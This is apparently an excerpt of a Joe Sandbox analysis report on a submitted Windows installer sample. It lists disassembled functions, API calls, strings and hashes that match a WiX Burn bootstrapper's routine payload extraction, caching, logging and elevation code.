CloseHandle.KERNEL32(00000000,00595489,?,00000000,?,0059C1D3,?,005953BD,00000000,?,005A784D,?,0059566D,00595479,00595479,00000000), ref: 005B16B4
CloseHandle.KERNEL32(00000000,00595489,?,00000000,?,0059C1D3,?,005953BD,00000000,?,005A784D,?,0059566D,00595479,00595479,00000000), ref: 005B16C3
CloseHandle.KERNEL32(00000000,00595489,?,00000000,?,0059C1D3,?,005953BD,00000000,?,005A784D,?,0059566D,00595479,00595479,00000000), ref: 005B16D2

Strings

Failed to set begin operation event., xrefs: 005B1653
cabextract.cpp, xrefs: 005B1649, 005B168D
Failed to wait for thread to terminate., xrefs: 005B1697

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CloseHandle$ErrorLast$EventObjectSingleWait
String ID: Failed to set begin operation event.$Failed to wait for thread to terminate.$cabextract.cpp
API String ID: 1206859064-226982402
Opcode ID: acc6d6d6a7ac7109506e53e4e6118e1c4585fc73547302c1ad4cb3953bbdb72b
Instruction ID: 1c111688379c28018caf8ca3bfdb7b3314b9d8b0d78c3f838a46a0c8b019a279
Opcode Fuzzy Hash: acc6d6d6a7ac7109506e53e4e6118e1c4585fc73547302c1ad4cb3953bbdb72b
Instruction Fuzzy Hash: 6521FD32501A22ABDB314F66CC09796BFA0BF08761F1A0226E90861DA0E774B810DADC

Function 005A41EC Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 005D0523: EnterCriticalSection.KERNEL32(005FB5FC,00000000,?,?,?,005A4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,005954FA,?), ref: 005D0533
Part of subcall function 005D0523: LeaveCriticalSection.KERNEL32(005FB5FC,?,?,005FB5F4,?,005A4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,005954FA,?), ref: 005D067A

OpenEventLogW.ADVAPI32(00000000,Application), ref: 005A4212
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 005A421E
ReportEventW.ADVAPI32(00000000,00000001,00000001,00000001,00000000,00000001,00000000,005E39D4,00000000), ref: 005A426B
CloseEventLog.ADVAPI32(00000000), ref: 005A4272

Strings

Application, xrefs: 005A420C
_Failed, xrefs: 005A41F7
Setup, xrefs: 005A41FC
logging.cpp, xrefs: 005A4242
txt, xrefs: 005A41F2
Failed to open Application event log, xrefs: 005A424C

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: Event$CriticalSection$CloseEnterErrorLastLeaveOpenReport
String ID: Application$Failed to open Application event log$Setup$_Failed$logging.cpp$txt
API String ID: 1844635321-1389066741
Opcode ID: 812ee0a25ef5064e96127b0a0610d8170d8b67b8f26c1ccfb539b4f0fb2921f1
Instruction ID: 6bf89d5149cde7a0ebe58045030caa80f6cfc5c3ad4822dbac70f9ccbc3d06bd
Opcode Fuzzy Hash: 812ee0a25ef5064e96127b0a0610d8170d8b67b8f26c1ccfb539b4f0fb2921f1
Instruction Fuzzy Hash: F5F0F937A822B1BA6B3522A71C0DE7F1D2CFEC3F21B02011AFC81F6180DB90990154F5

Function 005A93FE Relevance: 16.7, APIs: 2, Strings: 9, Instructions: 226COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(000007D0,000007D0,00000000,00000000,?,00000000,00000000,00000003,00000000,00000000), ref: 005A949E
GetLastError.KERNEL32(000007D0,000007D0,00000000,00000000,000007D0,00000001), ref: 005A94C6

Strings

Failed to allocate memory, xrefs: 005A946F
Failed to encode file hash., xrefs: 005A9551
Failed to get file hash., xrefs: 005A94F0
cache.cpp, xrefs: 005A94E6, 005A95FA, 005A964B
$, xrefs: 005A959D
Could not verify file %ls., xrefs: 005A9607
Failed to allocate string., xrefs: 005A9534
Could not close verify handle., xrefs: 005A9655
0, xrefs: 005A955E

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorLast
String ID: $$0$Could not close verify handle.$Could not verify file %ls.$Failed to allocate memory$Failed to allocate string.$Failed to encode file hash.$Failed to get file hash.$cache.cpp
API String ID: 1452528299-4263581490
Opcode ID: 5b33b57aa5add58b1f187e08cd2437b2b40a75f83d08454026c784d08eacc4ed
Instruction ID: 7e69efb55dadc16e5852e6f6c3c9c285b541f7de80b1f184382644e45df0beb5
Opcode Fuzzy Hash: 5b33b57aa5add58b1f187e08cd2437b2b40a75f83d08454026c784d08eacc4ed
Instruction Fuzzy Hash: 9D716072D01239ABDF21DF95C845BEEBFB8BF49750F11012AE915BB281E7349D008BA0

Function 005AE56C Relevance: 16.6, APIs: 11, Instructions: 86windowCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 005AE577
DefWindowProcW.USER32(?,00000082,?,?), ref: 005AE5B5
SetWindowLongW.USER32(?,000000EB,00000000), ref: 005AE5C2
SetWindowLongW.USER32(?,000000EB,?), ref: 005AE5D1
DefWindowProcW.USER32(?,?,?,?), ref: 005AE5DF
CreateCompatibleDC.GDI32(?), ref: 005AE5EB
SelectObject.GDI32(00000000,00000000), ref: 005AE5FC
StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 005AE61E
SelectObject.GDI32(00000000,00000000), ref: 005AE626
DeleteDC.GDI32(00000000), ref: 005AE629
PostQuitMessage.USER32(00000000), ref: 005AE637

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: Window$Long$ObjectProcSelect$CompatibleCreateDeleteMessagePostQuitStretch
String ID:
API String ID: 409979828-0
Opcode ID: a5b1ed9e3270e82f7f4cf6e2eec042dc94c0641b0112b057f40319826698c405
Instruction ID: e8615723b8978a00a6fe172d360f2ea286dcd90e52f525861d7952e167f91171
Opcode Fuzzy Hash: a5b1ed9e3270e82f7f4cf6e2eec042dc94c0641b0112b057f40319826698c405
Instruction Fuzzy Hash: 49214A32104104FFEB255F68EC0DD7F3FAAFB6A761B16491AF616971A0D7718810EB60

Function 005AA13A Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 222COMMON

Download Yara Rule

Strings

WixBundleLayoutDirectory, xrefs: 005AA26C
WixBundleLastUsedSource, xrefs: 005AA1A1
Failed to get bundle layout directory property., xrefs: 005AA287
Failed to combine last source with source., xrefs: 005AA210
Failed to get current process directory., xrefs: 005AA1F3
WixBundleOriginalSource, xrefs: 005AA1B7
Failed to combine layout source with source., xrefs: 005AA2A4
Failed to copy source path., xrefs: 005AA31A

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: Find$CloseFileFirstlstrlen
String ID: Failed to combine last source with source.$Failed to combine layout source with source.$Failed to copy source path.$Failed to get bundle layout directory property.$Failed to get current process directory.$WixBundleLastUsedSource$WixBundleLayoutDirectory$WixBundleOriginalSource
API String ID: 2767606509-3003062821
Opcode ID: 7f6a42b96b5a016eb13d72626574b68e456fc635d29a7a190b7c4a5f96619433
Instruction ID: f211a5c923eafd8a345c2316fc7db293404eb49f6277a1ed9be50623d4175842
Opcode Fuzzy Hash: 7f6a42b96b5a016eb13d72626574b68e456fc635d29a7a190b7c4a5f96619433
Instruction Fuzzy Hash: 13717A71D0121AAFDF269FA8D845AAEBFB9BF49310F14052AE910B7250E7319D40DB62

Function 00593076 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 210COMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32(00000040,00000000,00000040,00000000,00000040,00000000,00000000), ref: 005930C1
GetLastError.KERNEL32 ref: 005930C7
ExpandEnvironmentStringsW.KERNEL32(00000040,00000000,00000040,00000000,00000000), ref: 00593121
GetLastError.KERNEL32 ref: 00593127
GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005931DB
GetLastError.KERNEL32 ref: 005931E5
GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0059323B
GetLastError.KERNEL32 ref: 00593245

Strings

pathutil.cpp, xrefs: 005930EB

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorLast$EnvironmentExpandFullNamePathStrings
String ID: pathutil.cpp
API String ID: 1547313835-741606033
Opcode ID: 62cd9b925e906c8c26afd9fbe16028a116f54508237cdef78357bfb3126582ae
Instruction ID: ffe646ecf17a5c410fdce4431d5ff11c654bdf0aeeb6c530589c0b8ae200610f
Opcode Fuzzy Hash: 62cd9b925e906c8c26afd9fbe16028a116f54508237cdef78357bfb3126582ae
Instruction Fuzzy Hash: 0761A13BD0122AEBDF219BD48848B9EBFB9BB04750F124166EE10BB250E7359F0497D0

Function 0059CBC5 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 144COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,FFFEB88D,000000FF,00000001,000000FF,?,00000001,005953BD,00000000,00595489,00595445,WixBundleUILevel,840F01E8,?,00000001), ref: 0059CC1C

Strings

payload.cpp, xrefs: 0059CD1D
Failed to ensure directory exists, xrefs: 0059CCEE
Failed to find embedded payload: %ls, xrefs: 0059CC48
Failed to concat file paths., xrefs: 0059CCFC
Failed to get directory portion of local file path, xrefs: 0059CCF5
Payload was not found in container: %ls, xrefs: 0059CD29
Failed to extract file., xrefs: 0059CCE7
Failed to get next stream., xrefs: 0059CD03

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CompareString
String ID: Failed to concat file paths.$Failed to ensure directory exists$Failed to extract file.$Failed to find embedded payload: %ls$Failed to get directory portion of local file path$Failed to get next stream.$Payload was not found in container: %ls$payload.cpp
API String ID: 1825529933-1711239286
Opcode ID: 9ace1dd0e5e7080f74c9b2561a0650e1900e44cae20a9e50557f2a53d7e4cabe
Instruction ID: c9aae9534420999a1152b8cc1b2318ab6c177639c58bbfbf9f8750180a08ba63
Opcode Fuzzy Hash: 9ace1dd0e5e7080f74c9b2561a0650e1900e44cae20a9e50557f2a53d7e4cabe
Instruction Fuzzy Hash: BF41D031941219EBCF25DF48CD859AEBFA5FF40710F10816BE925AB391D7709E40DB90

Function 00594796 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 128windowthreadCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(00000000,00000000,00000400,00000400,00000000), ref: 005947BB
GetCurrentThreadId.KERNEL32 ref: 005947C1
GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0059484F

Strings

Failed to load UX., xrefs: 00594804
Failed to create user for UX., xrefs: 005947DB
Unexpected return value from message pump., xrefs: 005948A5
user.cpp, xrefs: 0059489B
Failed to start bootstrapper application., xrefs: 0059481D
wininet.dll, xrefs: 005947EE

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: Message$CurrentPeekThread
String ID: Failed to create user for UX.$Failed to load UX.$Failed to start bootstrapper application.$Unexpected return value from message pump.$user.cpp$wininet.dll
API String ID: 673430819-2573580774
Opcode ID: 02cb216c059829129abb0d91ea572dcf014b3a9c7734e854fab4378ecb5d9b49
Instruction ID: 3498c573d141f17f7c43ce8b2aa7d3b34e3d3455a5ade594af750dd44bb11d22
Opcode Fuzzy Hash: 02cb216c059829129abb0d91ea572dcf014b3a9c7734e854fab4378ecb5d9b49
Instruction Fuzzy Hash: 11419371601556FFEF259BA4CC89EBA7BADFF05314F10452AF904E7290DB20AD069BA0

Function 005B9C84 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 128COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,?,?,005BB03E,?,00000001,00000000), ref: 005B9D0F
GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,005BB03E,?,00000001,00000000,00000000,00000000,00000001,00000000), ref: 005B9D19
CopyFileExW.KERNEL32(00000000,00000000,005B9B69,?,?,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 005B9D67
GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,005BB03E,?,00000001,00000000,00000000,00000000,00000001,00000000), ref: 005B9D96

Strings

Failed to clear readonly bit on payload destination path: %ls, xrefs: 005B9D48
apply.cpp, xrefs: 005B9D3D, 005B9D81, 005B9DBA
copy, xrefs: 005B9CDD
Failed attempt to copy payload from: '%ls' to: %ls., xrefs: 005B9DC8
BA aborted copy of payload from: '%ls' to: %ls., xrefs: 005B9D8F

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorFileLast$AttributesCopy
String ID: BA aborted copy of payload from: '%ls' to: %ls.$Failed attempt to copy payload from: '%ls' to: %ls.$Failed to clear readonly bit on payload destination path: %ls$apply.cpp$copy
API String ID: 1969131206-836986073
Opcode ID: e9e49bcd9c67fee8f8333543f10c8e07684792fc4a0efedf441445532f1900ca
Instruction ID: 4e404c63ae953cb5ede223760348ac04ec7e38c8e7d068f3fa0c0569f479998b
Opcode Fuzzy Hash: e9e49bcd9c67fee8f8333543f10c8e07684792fc4a0efedf441445532f1900ca
Instruction Fuzzy Hash: 5231E872B41126FBDB249A57CC46EEB7F68BF81B50B15411ABE04EB241E720ED00D7E1

Function 005A8EBC Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 126COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000,?,00000001,80000005,?,00000000,00000000,00000000,00000003,000007D0), ref: 005A9007

Strings

Failed to allocate access for Users group to path: %ls, xrefs: 005A8F72
cache.cpp, xrefs: 005A8FB0
Failed to allocate access for Administrators group to path: %ls, xrefs: 005A8F0F
Failed to allocate access for SYSTEM group to path: %ls, xrefs: 005A8F30
Failed to create ACL to secure cache path: %ls, xrefs: 005A8FBB
Failed to allocate access for Everyone group to path: %ls, xrefs: 005A8F51
Failed to secure cache path: %ls, xrefs: 005A8FEA

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: FreeLocal
String ID: Failed to allocate access for Administrators group to path: %ls$Failed to allocate access for Everyone group to path: %ls$Failed to allocate access for SYSTEM group to path: %ls$Failed to allocate access for Users group to path: %ls$Failed to create ACL to secure cache path: %ls$Failed to secure cache path: %ls$cache.cpp
API String ID: 2826327444-4113288589
Opcode ID: c015a0a6e4d75aea84ffb1f6f409113ccb1188b164247d7bc2c53cabeb836431
Instruction ID: 0f3cfe207c1261710c905f68f783229a00707dfa775330fafe9003dd97f3150c
Opcode Fuzzy Hash: c015a0a6e4d75aea84ffb1f6f409113ccb1188b164247d7bc2c53cabeb836431
Instruction Fuzzy Hash: 7241E832A4132BBBDB315654CC0AFBE7E69FB56B10F114065FA04BA181DF71AE449BA0

Function 005A492F Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 117fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(00000000,crypt32.dll,00000008,?,00000000,?,00000000,00000000,crypt32.dll,00000000,?,?,?,00000000,?,00000000), ref: 005A495A
GetLastError.KERNEL32 ref: 005A4967
ReadFile.KERNEL32(?,00000000,?,?,00000000,?,00000000), ref: 005A4A12
GetLastError.KERNEL32 ref: 005A4A1C

Strings

Failed to read message from pipe., xrefs: 005A49E7
Failed to allocate data for message., xrefs: 005A49D0
crypt32.dll, xrefs: 005A4956
pipe.cpp, xrefs: 005A49C6, 005A49DD, 005A4A40
Failed to read data for message., xrefs: 005A4A4A

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorFileLastRead
String ID: Failed to allocate data for message.$Failed to read data for message.$Failed to read message from pipe.$crypt32.dll$pipe.cpp
API String ID: 1948546556-773887359
Opcode ID: 8df85a8540f3304c292138fc4d075e7474ee021f9b47e0e2a6df41f7abeeca81
Instruction ID: e78b3d83f52dc14f565a1ed874731e7d259ba775febc02cdbb74edd1ded36c4a
Opcode Fuzzy Hash: 8df85a8540f3304c292138fc4d075e7474ee021f9b47e0e2a6df41f7abeeca81
Instruction Fuzzy Hash: 5931D532D4022AEFDB249AE5CC46B6FBF69FB45B21F11812AFD40A6180D7B09D109FD4

Function 005D6C29 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 114COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,name,000000FF,00000000,00000000,00000000,?,7622DFD0), ref: 005D6C88
CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,email,000000FF), ref: 005D6CA5
SysFreeString.OLEAUT32(00000000), ref: 005D6CE3
SysFreeString.OLEAUT32(00000000), ref: 005D6D27

Strings

name, xrefs: 005D6C7A
uri, xrefs: 005D6CB3
`Dv, xrefs: 005D6CE3, 005D6D27
email, xrefs: 005D6C97

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: String$CompareFree
String ID: `Dv$email$name$uri
API String ID: 3589242889-3963012511
Opcode ID: 933c5c65f7648653ae7cd224fdf2750290f3604ce494b52bd8cdf557e504cb56
Instruction ID: b4336c67c5e8d543179cd4429aa6846f650b1c88d179a9238c8458dbb4fcac7e
Opcode Fuzzy Hash: 933c5c65f7648653ae7cd224fdf2750290f3604ce494b52bd8cdf557e504cb56
Instruction Fuzzy Hash: E9418F31A01219FBDB219B98CD45FADBB75FF04721F2142A7E920AB2E0C7359E05EB50

Function 005AE2AF Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 104windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(?,00000001), ref: 005AE2E5
GetLastError.KERNEL32 ref: 005AE2F1
GetObjectW.GDI32(00000000,00000018,?), ref: 005AE338
GetCursorPos.USER32(?), ref: 005AE359
MonitorFromPoint.USER32(?,?,00000002), ref: 005AE36B
GetMonitorInfoW.USER32(00000000,?), ref: 005AE381

Strings

(, xrefs: 005AE378
splashscreen.cpp, xrefs: 005AE315
Failed to load splash screen bitmap., xrefs: 005AE31F

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: Monitor$BitmapCursorErrorFromInfoLastLoadObjectPoint
String ID: ($Failed to load splash screen bitmap.$splashscreen.cpp
API String ID: 2342928100-598475503
Opcode ID: 52cb793b0dae7f59824793912a8b6035bb83e762f0bfeac61294d22d6b7eeb26
Instruction ID: 6864718c5bae711a39451407a001b83ca35a7b8cf4ec12cdc82c431731c7de98
Opcode Fuzzy Hash: 52cb793b0dae7f59824793912a8b6035bb83e762f0bfeac61294d22d6b7eeb26
Instruction Fuzzy Hash: 4C316175A01219DFDF10DFA9D94AA9EBBF5FF08710F15851AE904EB280DB70E904CBA1

Function 005A50CA Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 84COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,?,?,005DB500), ref: 005A50D3
GetProcessId.KERNEL32(000000FF,?,?,open,00000000,00000000,?,000000FF,?,?), ref: 005A5171
CloseHandle.KERNEL32(00000000), ref: 005A518A

Strings

Failed to allocate parameters for elevated process., xrefs: 005A510C
burn.elevated, xrefs: 005A50F3
-q -%ls %ls %ls %u, xrefs: 005A50F8
Failed to launch elevated child process: %ls, xrefs: 005A515E
runas, xrefs: 005A5131
open, xrefs: 005A513B, 005A5149

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: Process$CloseCurrentHandle
String ID: -q -%ls %ls %ls %u$Failed to allocate parameters for elevated process.$Failed to launch elevated child process: %ls$burn.elevated$open$runas
API String ID: 2815245435-1352204306
Opcode ID: d3357e2e06b22508bd07d7a11a5090334ae72e64e1d87ebfd3dc36441f8116c4
Instruction ID: c6661020db0c8270fad8c059210828dcd538f2ff4405f594ede3eea5f6ff9c09
Opcode Fuzzy Hash: d3357e2e06b22508bd07d7a11a5090334ae72e64e1d87ebfd3dc36441f8116c4
Instruction Fuzzy Hash: 59215775E01619FFCF259F95D885EAEBFB8FF05350B00816AF950A2250E7319E10EB90

Function 00596882 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 75libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(msi,DllGetVersion), ref: 005968AC
GetProcAddress.KERNEL32(00000000), ref: 005968B3
GetLastError.KERNEL32 ref: 005968BD

Strings

msi, xrefs: 005968A3
variable.cpp, xrefs: 005968E1
DllGetVersion, xrefs: 0059689E
Failed to set variant value., xrefs: 00596929
Failed to get msi.dll version info., xrefs: 00596905
Failed to find DllGetVersion entry point in msi.dll., xrefs: 005968EB

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: AddressErrorHandleLastModuleProc
String ID: DllGetVersion$Failed to find DllGetVersion entry point in msi.dll.$Failed to get msi.dll version info.$Failed to set variant value.$msi$variable.cpp
API String ID: 4275029093-842451892
Opcode ID: 4998eb108f4da456c5042b110942d50e4eac558a2cb6dc441fb90b116f0408bf
Instruction ID: 4668e8de40c1dd30e89a48ee9ae63ba9652d296fef16e8aa786bc465cd02e68c
Opcode Fuzzy Hash: 4998eb108f4da456c5042b110942d50e4eac558a2cb6dc441fb90b116f0408bf
